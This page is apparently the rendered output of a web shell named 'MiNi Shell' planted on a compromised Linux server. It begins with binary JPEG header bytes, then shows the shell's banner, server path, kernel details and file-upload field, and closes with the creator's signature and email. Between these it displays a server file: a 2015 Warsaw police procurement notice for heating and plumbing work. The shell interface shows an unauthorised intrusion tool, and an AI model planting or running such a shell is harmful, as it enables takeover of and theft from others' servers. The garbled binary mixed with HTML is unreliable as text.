JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150907/131983-N-2015.html

<p class="kh_header"><b>Warszawa: Wymiana wewnętrznej instalacji centralnego ogrzewania oraz pozostałej instalacji wod.-kan. trzech pionów łazienkowych w budynku mieszkalnym przy ul. Uniejowskiej 9  w Warszawie</b><br>
<b>Numer ogłoszenia: 131983 - 2015; data zamieszczenia: 07.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Skarb Państwa - Komendant Stołeczny Policji , ul. Nowolipie 2, 00-150 Warszawa, woj. mazowieckie, tel. 22 6038608. 6037691, faks 22 6037642.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.policja.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana wewnętrznej instalacji centralnego ogrzewania oraz pozostałej instalacji wod.-kan. trzech pionów łazienkowych w budynku mieszkalnym przy ul. Uniejowskiej 9  w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wymiana wewnętrznej instalacji centralnego ogrzewania oraz pionów instalacji sanitarnych łazienkowych w  budynku mieszkalnym, zwana dalej robotami. Budynek ten jest położony przy ul. Uniejowskiej 9 w Warszawie, posiada 10 kondygnacji naziemnych oraz 1 podziemną - piwnice.
2.	Opis robót wraz z wymaganiami dotyczącymi materiałów przewidzianych do wykonania robót zawarty został w opisie przedmiotu zamówienia oraz przedmiarach robót stanowiących Załącznik do Specyfikacji Istotnych Warunków Zamówienia.
3.	Zakres robót  obejmuje:
1)	wymianę wewnętrznej instalacji centralnego ogrzewania, w tym m.in.:
a)	demontaż instalacji centralnego ogrzewania do zaworów grzejnikowych wraz z wymianą zaworów na nowe. Trasy nowej instalacji przebiegać będą  zgodnie z trasami zdemontowanych rur,
2)	wymianę 3 pionów łazienkowych, w tym m.in.:  
a. 	wymianę instalacji zimnej i ciepłej wody,
b. 	wymianę instalacji kanalizacji,
c.	wymianę  cyrkulacji,
d.	demontaż instalacji wodociągowych do zaworów przelotowych wraz z wymianą zaworów na nowe. Trasy nowych rurociągów przebiegać będą  zgodnie z trasami zdemontowanych rurociągów,
e.  	wymianę rurociągu pionowego w instalacji kanalizacyjnej wraz z demontażem i ponownym montażem miski ustępowej. W przypadku zniszczeń przy demontażu miski ustępowej Wykonawca zobowiązany będzie do wymiany miski na nową na własny koszt. 
4.   Dostęp do pionów łazienkowych możliwy będzie tylko od strony pokoju przylegającego do łazienki. Lokator  zobowiązany będzie do usunięcia mebli, znajdujących się bezpośrednio przy ścianie, w której będą wykonywane rozkucia.
5.  	Po wykonaniu wymiany instalacji Wykonawca zobowiązany będzie do przywrócenia stanu pierwotnego tj: zamurowania otworów w ścianie, wykonania tynków i gładzi oraz dwukrotnego pomalowania ściany białą bądź kolorową farbą (dostarczoną przez lokatora). 
6.   Na czas wykonywania prac Wykonawca zobowiązany jest do zabezpieczenia w każdym lokalu podłogi folią   i papierem  karbowanym, a po zakończeniu prac do umycia podłóg.
7.   Prace związane z wymianą instalacji winny być wykonane w godzinach 8.00 - 19.00 z wyłączeniem niedziel i Świąt w sposób minimalizujący uciążliwość dla użytkowników budynku. Wszelkie zanieczyszczenia na klatce schodowej lub w windzie powstałe w wyniku wykonywania przedmiotu zamówienia Wykonawca zobowiązany będzie do sprzątnięcia  każdego dnia po zakończeniu robót. 
8.	Roboty budowlane objęte przedmiotem zamówienia powinny:
a.  spełniać wymagania i być zgodne:
a.1	z Polskimi Normami przenoszącymi europejskie normy zharmonizowane, warunkami techniczno-budowlanymi, przepisami bhp i p-poż,
a.2	z obowiązującymi przepisami ustawy Prawo budowlane (t.j. Dz.U. z 2013, poz. 1409 ze zm.) oraz Ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2014 poz.883.), 
a.3	przepisami wykonawczymi do ww. ustaw,
a.4. sztuką budowlaną,
b.	obejmować całość robót niezbędnych do realizacji zamówienia, w tym między innymi: utylizację materiałów z rozbiórki, roboty przygotowawcze, inwentaryzację powykonawczą, wykonanie, utrzymanie i likwidację zaplecza budowy, próby szczelności i płukanie instalacji, rozruch instalacji na gorąco wraz z regulacją.
	UWAGA! Złom powstały z demontażu istniejącej instalacji (rurociągi) Wykonawca dostarczy z wykorzystaniem własnego środka transportu i ludzi do punktu skupu złomu i uzyska dokument PZ (przychód zewnętrzny), który złoży Zamawiającemu. Całkowity koszt powyższego działania należy uwzględnić w cenie oferty.
c.  być wykonane z użyciem wskazanych w załączniku nr 1 do SIWZ nowych materiałów lub ich odpowiedników o parametrach równoważnych, spełniających wymogi funkcjonalne i techniczne określone w Ustawie z dnia 16 kwietnia 2004 roku o wyrobach budowlanych (Dz. U. z 2014 poz.883.),
Jeżeli w jakimkolwiek miejscu SIWZ oraz jej załącznikach zostały wskazane nazwy producenta, nazwy własne, znaki towarowe, patenty lub pochodzenia materiałów służących do wykonania robót budowlanych będących przedmiotem zamówienia - Zamawiający dopuszcza możliwość zastosowania materiałów równoważnych. Przez materiały równoważne Zamawiający rozumie odpowiedniki o parametrach równych lub wyższych. Zamawiający dopuszcza wszystkie rynkowe odpowiedniki o parametrach równych lub wyższych niż wskazane. Ciężar udowodnienia, że materiał (wyrób/urządzenie) jest równoważny w stosunku do wymogu określonego przez Zamawiającego spoczywa na Wykonawcach. 
  d.   być realizowane w sposób zapewniający ciągłość funkcjonowania budynku mieszkalnego, 
      e.  	być prowadzone w sposób gwarantujący zachowanie bezpieczeństwa mieszkańców znajdujących się w   budynku przy ul. Uniejowskiej 9 w Warszawie. 
      f.   	być wykonywane z zachowaniem szczególnej ostrożności oraz w sposób gwarantujący ochronę przed uszkodzeniem lub zniszczeniem własności publicznej i prywatnej. W przypadku, gdy w wyniku niewłaściwego prowadzenia robót przez Wykonawcę/Podwykonawcę lub dalszego Podwykonawcę nastąpi uszkodzenie lub zniszczenie własności publicznej lub prywatnej, Wykonawca na swój koszt naprawi lub odtworzy uszkodzoną własność.
g.   	być realizowane w oparciu o Harmonogram wykonania robót, o którym mowa w ogólnych warunkach umowy.
9.  	Wykonawca udzieli gwarancji na roboty budowlane będące przedmiotem zamówienia oraz wbudowane materiały i urządzenia na okres minimum  24  miesiące -  liczonych od daty podpisania protokołu odbioru końcowego. Wykonawca będzie odpowiadał z tytułu rękojmi za wady przedmiotu zamówienia przez okres minimum 60 miesięcy licząc od daty podpisania protokołu odbioru końcowego robót.
10. Osoba kierująca wykonaniem  robót budowlanych (kierownik budowy)  musi być w okresie wykonania zamówienia zatrudniony przez Wykonawcę na podstawie umowy o pracę w rozumieniu Kodeksu pracy.
11.	Zamawiający nie dopuszcza składania ofert częściowych ani wariantowych.
12. Wykonawca (z zastrzeżeniem pkt.13) może powierzyć wykonanie części zamówienia podwykonawcy. 
13.	Zgodnie z art.36 a ust.2 pkt 1 Ustawy Zamawiający zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowej części zamówienia, tj.: demontaż i montaż instalacji centralnego ogrzewania oraz pionów instalacji sanitarnych łazienkowych. W przypadku gdy Wykonawca w celu wykonania zamówienia zamierza powierzyć wykonanie części zamówienia podwykonawcy/podwykonawcom, zobowiązany jest do wskazania w ofercie tych części.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawców wniesienia zabezpieczenia wadialnego w wysokości  6 000,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy biorący udział w postępowaniu muszą posiadać doświadczenie, tj. wykazać się należytą realizacją, w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. 3  robót budowlanych obejmujących swym zakresem budowę, przebudowę, remont lub modernizację instalacji wod-kan. i c.o., o wartości nie mniejszej niż  200 000,00 brutto PLN każda</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy biorący udział w postępowaniu muszą dysponować osobami zdolnymi do wykonania zamówienia, tj.
	min. 16 osobami,  w tym co najmniej:
	a) 10 osobami z co najmniej 2 letnim doświadczeniem w wykonywaniu robót budowlanych obejmujących swym zakresem budowę, przebudowę, remont lub modernizację instalacji wod-kan. i c.o.  każda,
	b) 1 osobą posiadającą co najmniej 2 letnie doświadczenie w wykonywaniu robót budowlanych w w/w zakresie oraz uprawnienia budowlane bez ograniczeń do kierowania robotami, w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych  i kanalizacyjnych, zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2013r. poz.1409 ze zm.) wpisaną  na listę członków właściwej Izby Samorządu Zawodowego, zgodnie z ustawą z 15 grudnia 2000 roku o samorządach zawodowych architektów, inżynierów budownictwa (t.j. Dz.U. z 2014 poz. 1946 ze zm.) lub posiada  uprawnienia zgodnie z ustawą z dnia 17 kwietnia 2008 roku o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 roku,  nr 63 poz.394 ze zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy biorący udział w postępowaniu muszą pozostawać w sytuacji finansowej pozwalającej na realizację zamówienia, tj. posiadać środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 200 000,00 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca zobowiązany jest dołączyć do oferty:
1)  kosztorysy ofertowe, sporządzone na podstawie przedmiarów zawartych w załączniku nr 1 do SIWZ, 
 2)   oświadczenie, że wykona przedmiot zamówienia z użyciem materiałów opisanych w przedmiarze robót, zawartym w Załączniku   nr 1, a w przypadku zaoferowania równoważnych materiałów Wykonawca sporządzi wykaz materiałów równoważnych, ze wskazaniem typu, nazwy handlowej i producenta materiałów oraz ich parametrów technicznych (Wzór załącznik nr 12 do SIWZ). W przypadku zaoferowania materiałów równoważnych, Wykonawca poza wypełnieniem ww. wykazu zobowiązany jest dołączyć do oferty dokumenty potwierdzające parametry techniczne (np. karty katalogowe, DTR-ki)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca wykazując spełnienie warunku, o którym mowa w pkt III.3.2, III.3.4, III.3.5  może polegać na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b Ustawy. W celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów, w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający żąda w załączeniu do oferty w szczególności:
1) pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nie udostępnienia tych zasobów, chyba że za nie udostępnienie zasobów nie ponosi winy,
	2) dokumentów potwierdzających:
a) zakresu dostępnych wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
Zamawiający dopuszcza, aby informacje o których mowa w pkt 2) lit. a)-d) zawarte były w jednym dokumencie.
3) dokumentów, o których mowa w pkt III.4.2, dotyczących podmiotu, którego  zasobami wykonawca będzie dysponował, jeżeli podmiot ten będzie brał udział w realizacji części zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania zamówienia - 10</li>
<li>3 - Termin gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1	Strony przewidują możliwość dokonania zmian w treści umowy w przypadku jeżeli nastąpi:
a. zmiana technologii wykonania robót lub materiałów użytych do ich wykonania, pod warunkiem uzyskania zgody Zamawiającego, a zmiana ta jest korzystna dla Zamawiającego i nie spowoduje przekroczenia kwoty, do której zostanie zawarta umowa.
b. zmiana powszechnie obowiązujących przepisów prawa,
1.	Zamawiający przewiduje możliwość (po wcześniejszej akceptacji) wydłużenia  terminu wykonania umowy w przypadku:
a.	wystąpienia okoliczności leżących po stronie Zamawiającego, w szczególności: przedłużenia się procedury przetargowej, nieterminowego przekazania terenu robót, 
b.	konieczności zlecenia robót zamiennych,
c.	konieczności udzielenia zamówień dodatkowych, 
d.	zmian powszechnie obowiązujących przepisów prawa,
e.	wystąpienia przeszkód o obiektywnym charakterze (zdarzenia nadzwyczajne, zewnętrzne, niemożliwe do zapobieżenia, a więc mieszczące się w zakresie pojęciowym tzw. siły wyższej, klęski żywiołowej),
f.	konieczności wprowadzenia innych zmian do przedmiotu zamówienia, jeżeli z obiektywnych okoliczności nie można ich było przewidzieć na etapie przed zawarciem umowy
h.	Uzgodniona przez Strony zmiana terminu wymaga aktualizacji harmonogramu wykonania robót,
3.	Strony dopuszczają zmianę kwoty, do której zostanie zawarta umowa, oraz cen jednostkowych wskazanych w kosztorysie ofertowym, w przypadku ustawowej zmiany stawki podatku VAT (o procentową różnicę wartości wynikającą ze zmiany stawki podatku), wynoszącej w dniu składania ofert ....% (zgodnie z ofertą Wykonawcy) - jeżeli obowiązek podatkowy będzie leżał po stronie Wykonawcy.
4.	Zamawiający dopuszcza zmianę osób, które będą brały udział w realizacji zamówienia. W przypadku, zmiany Kierownika budowy, Wykonawca zobowiązany będzie wykazać Zamawiającemu, że proponowana przez niego osoba legitymuje się co najmniej równoważnymi uprawnieniami budowlanymi co osoba, której ta zmiana dotyczy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.policja.waw.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ze strony internetowej KSP lub na pisemny wniosek wykonawcy adresowany Wydział Zamówień Publicznych KSP ul. Nowolipie 2 00-150 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2015 godzina 11:30, miejsce: Komenda Stołeczna Policji z siedzibą:
ul. Nowolipie 2
00-150 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com